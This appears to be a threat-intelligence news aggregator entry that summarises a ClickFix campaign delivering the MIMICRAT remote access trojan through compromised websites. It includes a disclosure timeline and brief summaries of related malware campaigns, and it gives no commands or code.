Find notable cyber news and cases, enriched with sources, timelines, and signals.
Home Browse News Feed Stats Watchlists Beta About Contact

ClickFix compromised-site MIMICRAT campaign

Campaign
First reported
Last updated
Happening score
H score 38
1 unique sources, 1 articles

Summary

Hide ▲

The ClickFix campaign is abusing compromised legitimate sites to deliver the MIMICRAT remote access trojan through a multi-stage infection chain, widening risk across multiple industries, geographies, and 17 languages. The lure begins with a fake Cloudflare verification page and a copy-paste prompt that drives PowerShell execution, ETW/AMSI bypass, and a Lua-based loader. The operation matters because the implant supports token manipulation, SOCKS5 tunneling, and other post-exploitation actions that can enable ransomware deployment or data exfiltration.

Related Happenings

Secret Blizzard Kazuar modular P2P botnet

Malware Activity
First: 16.05.2026 17:15 Last: 16.05.2026 17:15 Sources 1

About this happening: **Kazuar** is being used in a **multi-stage campaign in Ukraine** that ESET says likely involves **Gamaredon** providing access and **Turla/Secret Blizzard** delivering the backdo...

Open Happening

Hive0163 extortion and ransomware campaign using ClickFix and malvertising

Campaign
First: 12.03.2026 19:02 Last: 12.03.2026 19:02 Sources 1

About this happening: Hive0163 is running an **active extortion and ransomware campaign** that expands access and raises the risk of **large-scale data exfiltration**. The operation uses **ClickFix**,...

Open Happening

Compromised legitimate WordPress websites used to infect visitors with infostealer malware campaign expands across multiple victims

Campaign
First: 11.03.2026 16:45 Last: 11.03.2026 16:45 Sources 1

About this happening: A **global ClickFix campaign** is abusing compromised **WordPress** sites to push **infostealer malware** to visitors, putting credentials and financial data at risk. The operatio...

Open Happening

OAuth-phished ZIP/LNK/PowerShell malware delivery chain

Malware Activity
First: 03.03.2026 11:20 Last: 03.03.2026 11:20 Sources 1

About this happening: **ZIP-delivered malware** now uses a **PowerShell** and **DLL side-loading** chain to infect Windows devices and reach an external **C2 server**, increasing the risk of follow-on...

Open Happening

UAT-10027 U.S. education and healthcare targeting campaign

Campaign
First: 26.02.2026 17:17 Last: 26.02.2026 17:17 Sources 1

About this happening: **UAT-10027** is running an active **campaign** against **U.S. education and healthcare organizations**, and the activity matters because it delivers a new backdoor and supporting...

Open Happening

Timeline

  1. 20.02.2026 13:55 2 articles · 3mo ago

    ClickFix MIMICRAT campaign disclosed

    Initial Disclosure

    A ClickFix campaign abuses compromised legitimate sites to deliver the MIMICRAT (aka AstarionRAT) remote access trojan. The infection chain starts at bincheck[.]io, uses a fake Cloudflare verification page and a Windows Run dialog copy-paste lure, then runs PowerShell, bypasses ETW and AMSI, and drops a Lua-based loader that executes shellcode to deploy the implant. Victims span multiple geographies, including a USA-based university and Chinese-speaking users, and the lure content is localized across 17 languages.

    Show sources
    Open in new tab